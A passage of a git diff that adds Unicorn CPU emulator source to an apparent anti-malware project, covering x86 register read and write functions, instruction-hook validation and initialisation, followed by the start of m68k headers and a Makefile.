X86_CPU(uc, mycpu)->env.tr.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.tr.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.tr.flags; + break; + case UC_X86_REG_MSR: + x86_msr_read(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + *(uint32_t *)value = X86_CPU(uc, mycpu)->env.mxcsr; + break; + case UC_X86_REG_XMM8: + case UC_X86_REG_XMM9: + case UC_X86_REG_XMM10: + case UC_X86_REG_XMM11: + case UC_X86_REG_XMM12: + case UC_X86_REG_XMM13: + case UC_X86_REG_XMM14: + case UC_X86_REG_XMM15: + { + float64 *dst = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + dst[0] = reg->_d[0]; + dst[1] = reg->_d[1]; + break; + } + case UC_X86_REG_FS_BASE: + *(uint64_t *)value = (uint64_t)X86_CPU(uc, mycpu)->env.segs[R_FS].base; + break; + case UC_X86_REG_GS_BASE: + *(uint64_t *)value = (uint64_t)X86_CPU(uc, mycpu)->env.segs[R_GS].base; + break; + } + break; +#endif + } + } + + return 0; +} + +int x86_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + int ret; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + switch(regid) { + default: + break; + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + { + uint64_t mant = *(uint64_t*) value; + uint16_t upper = *(uint16_t*) ((char*)value + sizeof(uint64_t)); + X86_CPU(uc, mycpu)->env.fpregs[regid - UC_X86_REG_FP0].d = cpu_set_fp80(mant, upper); + } + continue; + case UC_X86_REG_FPSW: + { + uint16_t fpus = *(uint16_t*) value; + X86_CPU(uc, mycpu)->env.fpus = fpus & ~0x3800; + X86_CPU(uc, mycpu)->env.fpstt = (fpus >> 11) & 0x7; + } + continue; + case UC_X86_REG_FPCW: + cpu_set_fpuc(&X86_CPU(uc, mycpu)->env, *(uint16_t *)value); + continue; + case UC_X86_REG_FPTAG: + { + int i; + uint16_t 
fptag = *(uint16_t*) value; + for (i = 0; i < 8; i++) { + X86_CPU(uc, mycpu)->env.fptags[i] = ((fptag & 3) == 3); + fptag >>= 2; + } + + continue; + } + break; + case UC_X86_REG_XMM0: + case UC_X86_REG_XMM1: + case UC_X86_REG_XMM2: + case UC_X86_REG_XMM3: + case UC_X86_REG_XMM4: + case UC_X86_REG_XMM5: + case UC_X86_REG_XMM6: + case UC_X86_REG_XMM7: + { + float64 *src = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + reg->_d[0] = src[0]; + reg->_d[1] = src[1]; + continue; + } + case UC_X86_REG_ST0: + case UC_X86_REG_ST1: + case UC_X86_REG_ST2: + case UC_X86_REG_ST3: + case UC_X86_REG_ST4: + case UC_X86_REG_ST5: + case UC_X86_REG_ST6: + case UC_X86_REG_ST7: + { + // value must be big enough to keep 80 bits (10 bytes) + memcpy(&FPST(regid - UC_X86_REG_ST0), value, 10); + continue; + } + case UC_X86_REG_YMM0: + case UC_X86_REG_YMM1: + case UC_X86_REG_YMM2: + case UC_X86_REG_YMM3: + case UC_X86_REG_YMM4: + case UC_X86_REG_YMM5: + case UC_X86_REG_YMM6: + case UC_X86_REG_YMM7: + case UC_X86_REG_YMM8: + case UC_X86_REG_YMM9: + case UC_X86_REG_YMM10: + case UC_X86_REG_YMM11: + case UC_X86_REG_YMM12: + case UC_X86_REG_YMM13: + case UC_X86_REG_YMM14: + case UC_X86_REG_YMM15: + { + float64 *src = (float64*)value; + XMMReg *lo_reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_YMM0]; + XMMReg *hi_reg = &X86_CPU(uc, mycpu)->env.ymmh_regs[regid - UC_X86_REG_YMM0]; + lo_reg->_d[0] = src[0]; + lo_reg->_d[1] = src[1]; + hi_reg->_d[0] = src[2]; + hi_reg->_d[1] = src[3]; + continue; + } + } + + switch(uc->mode) { + default: + break; + + case UC_MODE_16: + switch(regid) { + default: break; + case UC_X86_REG_ES: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_ES, *(uint16_t *)value); + continue; + case UC_X86_REG_SS: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_SS, *(uint16_t *)value); + continue; + case UC_X86_REG_DS: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_DS, *(uint16_t *)value); + continue; + case UC_X86_REG_FS: + 
load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + continue; + case UC_X86_REG_GS: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + continue; + } + // fall-thru + case UC_MODE_32: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0] = *(uint32_t *)value; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0] = *(uint32_t *)value; + break; + case UC_X86_REG_EFLAGS: + cpu_load_eflags(&X86_CPU(uc, mycpu)->env, *(uint32_t *)value, -1); + X86_CPU(uc, mycpu)->env.eflags0 = *(uint32_t *)value; + break; + case UC_X86_REG_EAX: + X86_CPU(uc, mycpu)->env.regs[R_EAX] = *(uint32_t *)value; + break; + case UC_X86_REG_AX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint16_t *)value); + break; + case UC_X86_REG_AH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_AL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_EBX: + X86_CPU(uc, mycpu)->env.regs[R_EBX] = *(uint32_t *)value; + break; + case UC_X86_REG_BX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint16_t *)value); + break; + case UC_X86_REG_BH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_BL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_ECX: + X86_CPU(uc, mycpu)->env.regs[R_ECX] = *(uint32_t *)value; + break; + case UC_X86_REG_CX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint16_t *)value); + break; + case UC_X86_REG_CH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case 
UC_X86_REG_CL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case UC_X86_REG_EDX: + X86_CPU(uc, mycpu)->env.regs[R_EDX] = *(uint32_t *)value; + break; + case UC_X86_REG_DX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint16_t *)value); + break; + case UC_X86_REG_DH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_DL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_ESP: + X86_CPU(uc, mycpu)->env.regs[R_ESP] = *(uint32_t *)value; + break; + case UC_X86_REG_SP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint16_t *)value); + break; + case UC_X86_REG_EBP: + X86_CPU(uc, mycpu)->env.regs[R_EBP] = *(uint32_t *)value; + break; + case UC_X86_REG_BP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint16_t *)value); + break; + case UC_X86_REG_ESI: + X86_CPU(uc, mycpu)->env.regs[R_ESI] = *(uint32_t *)value; + break; + case UC_X86_REG_SI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint16_t *)value); + break; + case UC_X86_REG_EDI: + X86_CPU(uc, mycpu)->env.regs[R_EDI] = *(uint32_t *)value; + break; + case UC_X86_REG_DI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint16_t *)value); + break; + case UC_X86_REG_EIP: + X86_CPU(uc, mycpu)->env.eip = *(uint32_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_IP: + X86_CPU(uc, mycpu)->env.eip = *(uint16_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_CS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_CS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_CS, *(uint16_t *)value); + break; + case UC_X86_REG_DS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_DS, *(uint16_t *)value); + if (ret) { + return ret; + } + 
cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_DS, *(uint16_t *)value); + break; + case UC_X86_REG_SS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_SS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_SS, *(uint16_t *)value); + break; + case UC_X86_REG_ES: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_ES, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_ES, *(uint16_t *)value); + break; + case UC_X86_REG_FS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + break; + case UC_X86_REG_GS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + break; + case UC_X86_REG_IDTR: + X86_CPU(uc, mycpu)->env.idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.idt.base = (uint32_t)((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_GDTR: + X86_CPU(uc, mycpu)->env.gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.gdt.base = (uint32_t)((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_LDTR: + X86_CPU(uc, mycpu)->env.ldt.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.ldt.base = (uint32_t)((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.ldt.flags = ((uc_x86_mmr *)value)->flags; + break; + case UC_X86_REG_TR: + X86_CPU(uc, mycpu)->env.tr.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.tr.base = (uint32_t)((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.tr.flags = ((uc_x86_mmr *)value)->flags; + break; + case 
UC_X86_REG_MSR: + x86_msr_write(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + cpu_set_mxcsr(&X86_CPU(uc, mycpu)->env, *(uint32_t *)value); + break; + /* + // Don't think base registers are a "thing" on x86 + case UC_X86_REG_FS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_FS].base = *(uint32_t *)value; + continue; + case UC_X86_REG_GS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_GS].base = *(uint32_t *)value; + continue; + */ + } + break; + +#ifdef TARGET_X86_64 + case UC_MODE_64: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0] = *(uint64_t *)value; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0] = *(uint64_t *)value; + break; + case UC_X86_REG_EFLAGS: + cpu_load_eflags(&X86_CPU(uc, mycpu)->env, *(uint64_t *)value, -1); + X86_CPU(uc, mycpu)->env.eflags0 = *(uint64_t *)value; + break; + case UC_X86_REG_RAX: + X86_CPU(uc, mycpu)->env.regs[R_EAX] = *(uint64_t *)value; + break; + case UC_X86_REG_EAX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint32_t *)value); + break; + case UC_X86_REG_AX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint16_t *)value); + break; + case UC_X86_REG_AH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_AL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_RBX: + X86_CPU(uc, mycpu)->env.regs[R_EBX] = *(uint64_t *)value; + break; + case UC_X86_REG_EBX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint32_t *)value); + break; + case UC_X86_REG_BX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint16_t *)value); + break; + case UC_X86_REG_BH: + 
WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_BL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_RCX: + X86_CPU(uc, mycpu)->env.regs[R_ECX] = *(uint64_t *)value; + break; + case UC_X86_REG_ECX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint32_t *)value); + break; + case UC_X86_REG_CX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint16_t *)value); + break; + case UC_X86_REG_CH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case UC_X86_REG_CL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case UC_X86_REG_RDX: + X86_CPU(uc, mycpu)->env.regs[R_EDX] = *(uint64_t *)value; + break; + case UC_X86_REG_EDX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint32_t *)value); + break; + case UC_X86_REG_DX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint16_t *)value); + break; + case UC_X86_REG_DH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_DL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_RSP: + X86_CPU(uc, mycpu)->env.regs[R_ESP] = *(uint64_t *)value; + break; + case UC_X86_REG_ESP: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint32_t *)value); + break; + case UC_X86_REG_SP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint16_t *)value); + break; + case UC_X86_REG_SPL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint8_t *)value); + break; + case UC_X86_REG_RBP: + X86_CPU(uc, mycpu)->env.regs[R_EBP] = *(uint64_t *)value; + break; + case UC_X86_REG_EBP: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint32_t *)value); + break; + case UC_X86_REG_BP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint16_t *)value); + break; + case UC_X86_REG_BPL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint8_t *)value); + break; + 
case UC_X86_REG_RSI: + X86_CPU(uc, mycpu)->env.regs[R_ESI] = *(uint64_t *)value; + break; + case UC_X86_REG_ESI: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint32_t *)value); + break; + case UC_X86_REG_SI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint16_t *)value); + break; + case UC_X86_REG_SIL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint8_t *)value); + break; + case UC_X86_REG_RDI: + X86_CPU(uc, mycpu)->env.regs[R_EDI] = *(uint64_t *)value; + break; + case UC_X86_REG_EDI: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint32_t *)value); + break; + case UC_X86_REG_DI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint16_t *)value); + break; + case UC_X86_REG_DIL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint8_t *)value); + break; + case UC_X86_REG_RIP: + X86_CPU(uc, mycpu)->env.eip = *(uint64_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_EIP: + X86_CPU(uc, mycpu)->env.eip = *(uint32_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_IP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.eip, *(uint16_t *)value); + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_CS: + X86_CPU(uc, mycpu)->env.segs[R_CS].selector = *(uint16_t *)value; + break; + case UC_X86_REG_DS: + X86_CPU(uc, mycpu)->env.segs[R_DS].selector = *(uint16_t *)value; + break; + case UC_X86_REG_SS: + X86_CPU(uc, mycpu)->env.segs[R_SS].selector = *(uint16_t *)value; + break; + case UC_X86_REG_ES: + X86_CPU(uc, mycpu)->env.segs[R_ES].selector = *(uint16_t *)value; + break; + case UC_X86_REG_FS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + break; + case UC_X86_REG_GS: + ret = 
uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + break; + case UC_X86_REG_R8: + X86_CPU(uc, mycpu)->env.regs[8] = *(uint64_t *)value; + break; + case UC_X86_REG_R8D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[8], *(uint32_t *)value); + break; + case UC_X86_REG_R8W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[8], *(uint16_t *)value); + break; + case UC_X86_REG_R8B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[8], *(uint8_t *)value); + break; + case UC_X86_REG_R9: + X86_CPU(uc, mycpu)->env.regs[9] = *(uint64_t *)value; + break; + case UC_X86_REG_R9D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[9], *(uint32_t *)value); + break; + case UC_X86_REG_R9W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[9], *(uint16_t *)value); + break; + case UC_X86_REG_R9B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[9], *(uint8_t *)value); + break; + case UC_X86_REG_R10: + X86_CPU(uc, mycpu)->env.regs[10] = *(uint64_t *)value; + break; + case UC_X86_REG_R10D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[10], *(uint32_t *)value); + break; + case UC_X86_REG_R10W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[10], *(uint16_t *)value); + break; + case UC_X86_REG_R10B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[10], *(uint8_t *)value); + break; + case UC_X86_REG_R11: + X86_CPU(uc, mycpu)->env.regs[11] = *(uint64_t *)value; + break; + case UC_X86_REG_R11D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[11], *(uint32_t *)value); + break; + case UC_X86_REG_R11W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[11], *(uint16_t *)value); + break; + case UC_X86_REG_R11B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[11], *(uint8_t *)value); + break; + case UC_X86_REG_R12: + X86_CPU(uc, mycpu)->env.regs[12] = *(uint64_t *)value; + break; + case UC_X86_REG_R12D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[12], *(uint32_t *)value); + break; + case UC_X86_REG_R12W: + WRITE_WORD(X86_CPU(uc, 
mycpu)->env.regs[12], *(uint16_t *)value); + break; + case UC_X86_REG_R12B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[12], *(uint8_t *)value); + break; + case UC_X86_REG_R13: + X86_CPU(uc, mycpu)->env.regs[13] = *(uint64_t *)value; + break; + case UC_X86_REG_R13D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[13], *(uint32_t *)value); + break; + case UC_X86_REG_R13W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[13], *(uint16_t *)value); + break; + case UC_X86_REG_R13B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[13], *(uint8_t *)value); + break; + case UC_X86_REG_R14: + X86_CPU(uc, mycpu)->env.regs[14] = *(uint64_t *)value; + break; + case UC_X86_REG_R14D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[14], *(uint32_t *)value); + break; + case UC_X86_REG_R14W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[14], *(uint16_t *)value); + break; + case UC_X86_REG_R14B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[14], *(uint8_t *)value); + break; + case UC_X86_REG_R15: + X86_CPU(uc, mycpu)->env.regs[15] = *(uint64_t *)value; + break; + case UC_X86_REG_R15D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[15], *(uint32_t *)value); + break; + case UC_X86_REG_R15W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[15], *(uint16_t *)value); + break; + case UC_X86_REG_R15B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[15], *(uint8_t *)value); + break; + case UC_X86_REG_IDTR: + X86_CPU(uc, mycpu)->env.idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.idt.base = ((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_GDTR: + X86_CPU(uc, mycpu)->env.gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.gdt.base = ((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_LDTR: + X86_CPU(uc, mycpu)->env.ldt.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.ldt.base = ((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.ldt.flags = ((uc_x86_mmr *)value)->flags; 
+ break; + case UC_X86_REG_TR: + X86_CPU(uc, mycpu)->env.tr.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.tr.base = ((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.tr.flags = ((uc_x86_mmr *)value)->flags; + break; + case UC_X86_REG_MSR: + x86_msr_write(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + cpu_set_mxcsr(&X86_CPU(uc, mycpu)->env, *(uint32_t *)value); + break; + case UC_X86_REG_XMM8: + case UC_X86_REG_XMM9: + case UC_X86_REG_XMM10: + case UC_X86_REG_XMM11: + case UC_X86_REG_XMM12: + case UC_X86_REG_XMM13: + case UC_X86_REG_XMM14: + case UC_X86_REG_XMM15: + { + float64 *src = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + reg->_d[0] = src[0]; + reg->_d[1] = src[1]; + break; + } + case UC_X86_REG_FS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_FS].base = *(uint64_t *)value; + continue; + case UC_X86_REG_GS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_GS].base = *(uint64_t *)value; + continue; + } + break; +#endif + } + } + + return 0; +} + +DEFAULT_VISIBILITY +int x86_uc_machine_init(struct uc_struct *uc) +{ + return machine_initialize(uc); +} + +static bool x86_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case EXCP06_ILLOP: + return true; + } +} + +void pc_machine_init(struct uc_struct *uc); + +static bool x86_insn_hook_validate(uint32_t insn_enum) +{ + //for x86 we can only hook IN, OUT, and SYSCALL + if (insn_enum != UC_X86_INS_IN + && insn_enum != UC_X86_INS_OUT + && insn_enum != UC_X86_INS_SYSCALL + && insn_enum != UC_X86_INS_SYSENTER) { + return false; + } + return true; +} + +DEFAULT_VISIBILITY +void x86_uc_init(struct uc_struct* uc) +{ + apic_register_types(uc); + apic_common_register_types(uc); + register_accel_types(uc); + pc_machine_register_types(uc); + x86_cpu_register_types(uc); + pc_machine_init(uc); // pc_piix + uc->reg_read = x86_reg_read; + uc->reg_write = 
x86_reg_write; + uc->reg_reset = x86_reg_reset; + uc->release = x86_release; + uc->set_pc = x86_set_pc; + uc->stop_interrupt = x86_stop_interrupt; + uc->insn_hook_validate = x86_insn_hook_validate; + uc_common_init(uc); +} + +/* vim: set ts=4 sts=4 sw=4 et: */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.h new file mode 100644 index 0000000..cb29200 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.h @@ -0,0 +1,17 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_I386_H +#define UC_QEMU_TARGET_I386_H + +// functions to read & write registers +int x86_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int x86_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void x86_reg_reset(struct uc_struct *uc); + +void x86_uc_init(struct uc_struct* uc); +int x86_uc_machine_init(struct uc_struct *uc); + +extern const int X86_REGS_STORAGE_SIZE; +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/Makefile.objs new file mode 100644 index 0000000..f87fde4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/Makefile.objs @@ -0,0 +1,2 @@ +obj-y += translate.o op_helper.o helper.o cpu.o +obj-y += unicorn.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu-qom.h new file mode 100644 index 0000000..d8a4917 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu-qom.h @@ -0,0 +1,83 @@ +/* + * QEMU Motorola 68k CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published 
by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_M68K_CPU_QOM_H +#define QEMU_M68K_CPU_QOM_H + +#include "qom/cpu.h" + +#define TYPE_M68K_CPU "m68k-cpu" + +#define M68K_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, M68kCPUClass, (klass), TYPE_M68K_CPU) +#define M68K_CPU(uc, obj) ((M68kCPU *)obj) +#define M68K_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, M68kCPUClass, (obj), TYPE_M68K_CPU) + +/** + * M68kCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent 